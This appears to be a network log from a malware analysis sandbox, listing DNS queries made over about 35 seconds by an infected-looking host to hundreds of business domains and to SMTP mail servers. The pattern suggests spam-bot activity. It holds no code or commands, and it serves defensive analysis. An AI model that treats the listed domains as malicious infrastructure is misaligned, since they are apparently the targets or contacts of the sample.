Mar 22, 2023 05:43:25.808070898 CET	192.168.2.5	8.8.8.8	0xfde9	Standard query (0)	www.dgmna.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.809537888 CET	192.168.2.5	8.8.8.8	0x3e4f	Standard query (0)	www.quadlock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.815298080 CET	192.168.2.5	8.8.8.8	0xbad4	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.045228004 CET	192.168.2.5	8.8.8.8	0x9401	Standard query (0)	www.rs-ag.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.049021959 CET	192.168.2.5	8.8.8.8	0x35d7	Standard query (0)	www.mqs.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.512717962 CET	192.168.2.5	8.8.8.8	0x1fb5	Standard query (0)	www.alteor.cl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.514097929 CET	192.168.2.5	8.8.8.8	0x252c	Standard query (0)	www.valdal.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.533083916 CET	192.168.2.5	8.8.8.8	0x77fe	Standard query (0)	www.item-pr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.533083916 CET	192.168.2.5	8.8.8.8	0xee12	Standard query (0)	www.vazir.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.545783997 CET	192.168.2.5	8.8.8.8	0x3354	Standard query (0)	www.depalo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.672632933 CET	192.168.2.5	8.8.8.8	0xbdcf	Standard query (0)	www.credo.edu.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.319931984 CET	192.168.2.5	8.8.8.8	0x95de	Standard query (0)	www.elpro.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.322509050 CET	192.168.2.5	8.8.8.8	0x1869	Standard query (0)	www.nunomira.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.332016945 CET	192.168.2.5	8.8.8.8	0x1f8c	Standard query (0)	www.otena.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.334408045 CET	192.168.2.5	8.8.8.8	0xb139	Standard query (0)	www.petsfan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.363730907 CET	192.168.2.5	8.8.8.8	0xe8b3	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.515917063 CET	192.168.2.5	8.8.8.8	0xcb37	Standard query (0)	www.nelipak.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.517401934 CET	192.168.2.5	8.8.8.8	0x499	Standard query (0)	www.tvtools.fi	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.517443895 CET	192.168.2.5	8.8.8.8	0x838f	Standard query (0)	www.transsib.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.555746078 CET	192.168.2.5	8.8.8.8	0x8f7c	Standard query (0)	www.t-tre.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.555840969 CET	192.168.2.5	8.8.8.8	0xa1e6	Standard query (0)	www.abart.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.309026003 CET	192.168.2.5	8.8.8.8	0x7377	Standard query (0)	www.evcpa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.312710047 CET	192.168.2.5	8.8.8.8	0x85ac	Standard query (0)	www.abdg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.313795090 CET	192.168.2.5	8.8.8.8	0xd7ac	Standard query (0)	www.naoi-a.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.315403938 CET	192.168.2.5	8.8.8.8	0xcd51	Standard query (0)	www.ora.ecnet.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.394687891 CET	192.168.2.5	8.8.8.8	0x9d41	Standard query (0)	www.edimart.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.396836042 CET	192.168.2.5	8.8.8.8	0x84dc	Standard query (0)	www.jroy.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.413312912 CET	192.168.2.5	8.8.8.8	0x4183	Standard query (0)	www.cokocoko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.741964102 CET	192.168.2.5	8.8.8.8	0xd09c	Standard query (0)	www.vexcom.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.751755953 CET	192.168.2.5	8.8.8.8	0x5aca	Standard query (0)	www.xaicom.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.758426905 CET	192.168.2.5	8.8.8.8	0x4871	Standard query (0)	www.hummer.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.281219006 CET	192.168.2.5	8.8.8.8	0xc0c9	Standard query (0)	www.medius.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.413546085 CET	192.168.2.5	8.8.8.8	0x7f66	Standard query (0)	www.pcgrate.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.417318106 CET	192.168.2.5	8.8.8.8	0x54da	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.420500994 CET	192.168.2.5	8.8.8.8	0x53ac	Standard query (0)	www.sjbs.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.523653984 CET	192.168.2.5	8.8.8.8	0x2068	Standard query (0)	www.aevga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.524233103 CET	192.168.2.5	8.8.8.8	0xfd77	Standard query (0)	www.waldi.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.603671074 CET	192.168.2.5	8.8.8.8	0x9a0	Standard query (0)	www.speelhal.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.623631954 CET	192.168.2.5	8.8.8.8	0x7aa4	Standard query (0)	www.ka-mo-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.905399084 CET	192.168.2.5	8.8.8.8	0x5a2b	Standard query (0)	www.holleman.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.906928062 CET	192.168.2.5	8.8.8.8	0xc84d	Standard query (0)	www.gpthink.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.913662910 CET	192.168.2.5	8.8.8.8	0x441d	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.013564110 CET	192.168.2.5	8.8.8.8	0x337b	Standard query (0)	www.jacomfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.462647915 CET	192.168.2.5	8.8.8.8	0xbd1b	Standard query (0)	www.netcr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.557881117 CET	192.168.2.5	8.8.8.8	0xe2bb	Standard query (0)	www.maktraxx.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.558017015 CET	192.168.2.5	8.8.8.8	0xcdbc	Standard query (0)	www.stnic.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.595345020 CET	192.168.2.5	8.8.8.8	0xd7f	Standard query (0)	www.fink.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.635870934 CET	192.168.2.5	8.8.8.8	0x9a0	Standard query (0)	www.speelhal.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:30.794096947 CET	192.168.2.5	8.8.8.8	0x9d4f	Standard query (0)	www.com-sit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.052026987 CET	192.168.2.5	8.8.8.8	0x5aa5	Standard query (0)	www.jchysk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.057229042 CET	192.168.2.5	8.8.8.8	0x9787	Standard query (0)	www.findbc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.224610090 CET	192.168.2.5	8.8.8.8	0x2cc5	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.492413998 CET	192.168.2.5	8.8.8.8	0x86c2	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.569710970 CET	192.168.2.5	8.8.8.8	0x810	Standard query (0)	www.mobilnic.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.572207928 CET	192.168.2.5	8.8.8.8	0x51ad	Standard query (0)	www.cel-cpa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.814851999 CET	192.168.2.5	8.8.8.8	0xd1a1	Standard query (0)	www.lrsuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.884902000 CET	192.168.2.5	8.8.8.8	0x7891	Standard query (0)	www.nqks.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:31.886390924 CET	192.168.2.5	8.8.8.8	0x3c1b	Standard query (0)	www.c9dd.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.567136049 CET	192.168.2.5	8.8.8.8	0xcb5c	Standard query (0)	www.dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.567817926 CET	192.168.2.5	8.8.8.8	0xc917	Standard query (0)	www.kernsafe.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.568392992 CET	192.168.2.5	8.8.8.8	0x3088	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.708623886 CET	192.168.2.5	8.8.8.8	0xa590	Standard query (0)	www.myropcb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.761367083 CET	192.168.2.5	8.8.8.8	0xa776	Standard query (0)	www.domon.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:32.858416080 CET	192.168.2.5	8.8.8.8	0x4866	Standard query (0)	www.fe-bauer.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.479310036 CET	192.168.2.5	8.8.8.8	0x4f9a	Standard query (0)	www.stajum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.505481958 CET	192.168.2.5	8.8.8.8	0xa71f	Standard query (0)	www.pwd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.540756941 CET	192.168.2.5	8.8.8.8	0x8ac1	Standard query (0)	www.pupi.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.833479881 CET	192.168.2.5	8.8.8.8	0x23c2	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:33.841471910 CET	192.168.2.5	8.8.8.8	0xe7f3	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:34.336406946 CET	192.168.2.5	8.8.8.8	0x4fb0	Standard query (0)	www.yoruksut.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:35.022231102 CET	192.168.2.5	8.8.8.8	0xf65	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:35.717199087 CET	192.168.2.5	8.8.8.8	0x6b55	Standard query (0)	www.ottospm.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.844686985 CET	192.168.2.5	8.8.8.8	0x34b2	Standard query (0)	www.pr-park.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.847812891 CET	192.168.2.5	8.8.8.8	0x17df	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.851613998 CET	192.168.2.5	8.8.8.8	0xaf05	Standard query (0)	www.pdqhomes.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.855037928 CET	192.168.2.5	8.8.8.8	0x1114	Standard query (0)	www.baijaku.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.858161926 CET	192.168.2.5	8.8.8.8	0x830d	Standard query (0)	www.olras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.861243963 CET	192.168.2.5	8.8.8.8	0x1cf2	Standard query (0)	www.quadlock.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:36.863442898 CET	192.168.2.5	8.8.8.8	0xf8e6	Standard query (0)	www.dgmna.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.583631992 CET	192.168.2.5	8.8.8.8	0x6406	Standard query (0)	www.railbook.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.718831062 CET	192.168.2.5	8.8.8.8	0x30b0	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.726788044 CET	192.168.2.5	8.8.8.8	0xdd20	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.737844944 CET	192.168.2.5	8.8.8.8	0x8dd1	Standard query (0)	www.jenco.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.854710102 CET	192.168.2.5	8.8.8.8	0xa969	Standard query (0)	www.mqs.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.868805885 CET	192.168.2.5	8.8.8.8	0xbaf9	Standard query (0)	www.iamdirt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:38.996850014 CET	192.168.2.5	8.8.8.8	0x6941	Standard query (0)	www.rs-ag.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.127134085 CET	192.168.2.5	8.8.8.8	0x1072	Standard query (0)	www.alteor.cl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.131004095 CET	192.168.2.5	8.8.8.8	0xfaba	Standard query (0)	www.valdal.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.218579054 CET	192.168.2.5	8.8.8.8	0x2ad6	Standard query (0)	www.item-pr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.329868078 CET	192.168.2.5	8.8.8.8	0x3f2c	Standard query (0)	www.wifi4all.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.370014906 CET	192.168.2.5	8.8.8.8	0xd31d	Standard query (0)	www.vazir.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.466953993 CET	192.168.2.5	8.8.8.8	0xf310	Standard query (0)	www.depalo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.469698906 CET	192.168.2.5	8.8.8.8	0x97b7	Standard query (0)	www.credo.edu.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.479224920 CET	192.168.2.5	8.8.8.8	0x8ad2	Standard query (0)	www.elpro.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.505404949 CET	192.168.2.5	8.8.8.8	0x5613	Standard query (0)	www.fcwcvt.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.594948053 CET	192.168.2.5	8.8.8.8	0x410	Standard query (0)	www.petsfan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.930422068 CET	192.168.2.5	8.8.8.8	0x348e	Standard query (0)	www.owsports.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.930964947 CET	192.168.2.5	8.8.8.8	0x17a	Standard query (0)	www.transsib.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.940408945 CET	192.168.2.5	8.8.8.8	0xbb5b	Standard query (0)	www.tvtools.fi	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:39.942140102 CET	192.168.2.5	8.8.8.8	0x74fb	Standard query (0)	www.otena.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.014585018 CET	192.168.2.5	8.8.8.8	0x52c2	Standard query (0)	www.abart.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.126804113 CET	192.168.2.5	8.8.8.8	0x8010	Standard query (0)	www.snugpak.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.434338093 CET	192.168.2.5	8.8.8.8	0x6fbb	Standard query (0)	www.photo4b.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.607757092 CET	192.168.2.5	8.8.8.8	0x663b	Standard query (0)	www.evcpa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.608500957 CET	192.168.2.5	8.8.8.8	0x82c9	Standard query (0)	www.naoi-a.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.609078884 CET	192.168.2.5	8.8.8.8	0xe243	Standard query (0)	www.abdg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.612871885 CET	192.168.2.5	8.8.8.8	0x28b5	Standard query (0)	www.ora.ecnet.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.628295898 CET	192.168.2.5	8.8.8.8	0xb1fc	Standard query (0)	www.t-tre.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.708681107 CET	192.168.2.5	8.8.8.8	0x7f7b	Standard query (0)	www.crcsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:40.740278006 CET	192.168.2.5	8.8.8.8	0x6714	Standard query (0)	www.nelipak.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.125447989 CET	192.168.2.5	8.8.8.8	0x6a87	Standard query (0)	www.xaicom.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.126144886 CET	192.168.2.5	8.8.8.8	0x3cb3	Standard query (0)	www.hummer.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.132756948 CET	192.168.2.5	8.8.8.8	0xc723	Standard query (0)	www.ora-ito.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.289196968 CET	192.168.2.5	8.8.8.8	0xeaa5	Standard query (0)	www.synetik.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.291577101 CET	192.168.2.5	8.8.8.8	0x86ca	Standard query (0)	www.cokocoko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.334724903 CET	192.168.2.5	8.8.8.8	0x3045	Standard query (0)	www.edimart.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.460603952 CET	192.168.2.5	8.8.8.8	0x6b0c	Standard query (0)	www.waldi.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.968312979 CET	192.168.2.5	8.8.8.8	0x45e1	Standard query (0)	www.pcgrate.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.968792915 CET	192.168.2.5	8.8.8.8	0x250f	Standard query (0)	www.holleman.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.968792915 CET	192.168.2.5	8.8.8.8	0x38af	Standard query (0)	www.gpthink.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:41.988673925 CET	192.168.2.5	8.8.8.8	0xa34f	Standard query (0)	www.udesign.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.086252928 CET	192.168.2.5	8.8.8.8	0xd819	Standard query (0)	www.jacomfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.135560989 CET	192.168.2.5	8.8.8.8	0x6a87	Standard query (0)	www.xaicom.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.277620077 CET	192.168.2.5	8.8.8.8	0x8479	Standard query (0)	www.speelhal.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.447530985 CET	192.168.2.5	8.8.8.8	0x5da	Standard query (0)	www.aevga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.536519051 CET	192.168.2.5	8.8.8.8	0x64d9	Standard query (0)	www.findbc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.657819986 CET	192.168.2.5	8.8.8.8	0x5ad5	Standard query (0)	www.jchysk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:42.672616959 CET	192.168.2.5	8.8.8.8	0xbc2a	Standard query (0)	www.tyrns.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.016704082 CET	192.168.2.5	8.8.8.8	0x250f	Standard query (0)	www.holleman.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.305440903 CET	192.168.2.5	8.8.8.8	0x45e5	Standard query (0)	www.spanesi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.400279045 CET	192.168.2.5	8.8.8.8	0x523	Standard query (0)	www.c9dd.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.400788069 CET	192.168.2.5	8.8.8.8	0x2eb3	Standard query (0)	www.fink.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.418390036 CET	192.168.2.5	8.8.8.8	0xf2a0	Standard query (0)	www.stnic.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.424217939 CET	192.168.2.5	8.8.8.8	0x428e	Standard query (0)	www.dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.505754948 CET	192.168.2.5	8.8.8.8	0x47fd	Standard query (0)	www.tc17.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.772969961 CET	192.168.2.5	8.8.8.8	0xb230	Standard query (0)	www.stajum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.774626017 CET	192.168.2.5	8.8.8.8	0xcff2	Standard query (0)	www.domon.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.807866096 CET	192.168.2.5	8.8.8.8	0x55dc	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:43.913492918 CET	192.168.2.5	8.8.8.8	0x4b93	Standard query (0)	www.mobilnic.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:44.057365894 CET	192.168.2.5	8.8.8.8	0x250f	Standard query (0)	www.holleman.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:44.084264994 CET	192.168.2.5	8.8.8.8	0x2c06	Standard query (0)	www.pwd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:44.539597034 CET	192.168.2.5	8.8.8.8	0xcc04	Standard query (0)	www.nqks.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:45.153661966 CET	192.168.2.5	8.8.8.8	0xe298	Standard query (0)	www.myropcb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:45.445115089 CET	192.168.2.5	8.8.8.8	0xb669	Standard query (0)	www.pupi.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.292265892 CET	192.168.2.5	8.8.8.8	0x1033	Standard query (0)	www.yoruksut.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.432643890 CET	192.168.2.5	8.8.8.8	0x77e2	Standard query (0)	www.netcr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.680291891 CET	192.168.2.5	8.8.8.8	0xaa84	Standard query (0)	smtp.sbcglobal.yahoo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:46.780472040 CET	192.168.2.5	8.8.8.8	0x428a	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.057521105 CET	192.168.2.5	8.8.8.8	0x8dd3	Standard query (0)	www.kernsafe.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.241014004 CET	192.168.2.5	8.8.8.8	0x96c2	Standard query (0)	www.medius.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.561819077 CET	192.168.2.5	8.8.8.8	0xa5c6	Standard query (0)	www.lrsuk.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:47.723401070 CET	192.168.2.5	8.8.8.8	0xfde6	Standard query (0)	www.ka-mo-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.151377916 CET	192.168.2.5	8.8.8.8	0xd080	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.152555943 CET	192.168.2.5	8.8.8.8	0x8320	Standard query (0)	www.iamdirt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.187304020 CET	192.168.2.5	8.8.8.8	0xfc4c	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.392839909 CET	192.168.2.5	8.8.8.8	0xfb9a	Standard query (0)	www.wifi4all.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:48.564512014 CET	192.168.2.5	8.8.8.8	0xdffc	Standard query (0)	www.fcwcvt.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.073574066 CET	192.168.2.5	8.8.8.8	0x5c69	Standard query (0)	www.com-sit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.171766043 CET	192.168.2.5	8.8.8.8	0x7c46	Standard query (0)	www.snugpak.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.477540970 CET	192.168.2.5	8.8.8.8	0xd30c	Standard query (0)	www.photo4b.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:49.737417936 CET	192.168.2.5	8.8.8.8	0xeeac	Standard query (0)	www.crcsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:50.102129936 CET	192.168.2.5	8.8.8.8	0xb57d	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:50.207195997 CET	192.168.2.5	8.8.8.8	0x98bc	Standard query (0)	www.ora-ito.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:50.601303101 CET	192.168.2.5	8.8.8.8	0x64e2	Standard query (0)	www.yocinc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:51.227694988 CET	192.168.2.5	8.8.8.8	0xe534	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:52.066816092 CET	192.168.2.5	8.8.8.8	0x1391	Standard query (0)	smtp.live.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:52.229743958 CET	192.168.2.5	8.8.8.8	0xe534	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:52.859970093 CET	192.168.2.5	8.8.8.8	0x26d5	Standard query (0)	www.fnsds.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:53.277601004 CET	192.168.2.5	8.8.8.8	0xe534	Standard query (0)	www.vitaindu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:53.559854031 CET	192.168.2.5	8.8.8.8	0x5bc1	Standard query (0)	www.pohlfood.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:54.601344109 CET	192.168.2.5	8.8.8.8	0xb031	Standard query (0)	www.ottospm.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:54.611798048 CET	192.168.2.5	8.8.8.8	0xe78f	Standard query (0)	www.valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:55.381057024 CET	192.168.2.5	8.8.8.8	0xe84c	Standard query (0)	www.11tochi.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:57.950213909 CET	192.168.2.5	8.8.8.8	0xf716	Standard query (0)	www.railbook.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:57.954154015 CET	192.168.2.5	8.8.8.8	0x20fc	Standard query (0)	www.tyrns.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:57.956465960 CET	192.168.2.5	8.8.8.8	0xf02	Standard query (0)	www.2print.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:58.440696955 CET	192.168.2.5	8.8.8.8	0xa513	Standard query (0)	www.x0c.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:58.450726986 CET	192.168.2.5	8.8.8.8	0xc3a5	Standard query (0)	www.pb-games.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.051018953 CET	192.168.2.5	8.8.8.8	0x1590	Standard query (0)	www.spanesi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.054950953 CET	192.168.2.5	8.8.8.8	0x9778	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.282887936 CET	192.168.2.5	8.8.8.8	0x5036	Standard query (0)	www.tc17.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:59.478379011 CET	192.168.2.5	8.8.8.8	0x1e11	Standard query (0)	www.sclover3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.040775061 CET	192.168.2.5	8.8.8.8	0xe333	Standard query (0)	www.medius.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.356268883 CET	192.168.2.5	8.8.8.8	0xd644	Standard query (0)	www.ka-mo-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.372483969 CET	192.168.2.5	8.8.8.8	0xdc69	Standard query (0)	smtp.live.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:00.985886097 CET	192.168.2.5	8.8.8.8	0x15	Standard query (0)	www.nunomira.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:01.267961979 CET	192.168.2.5	8.8.8.8	0x6c8b	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
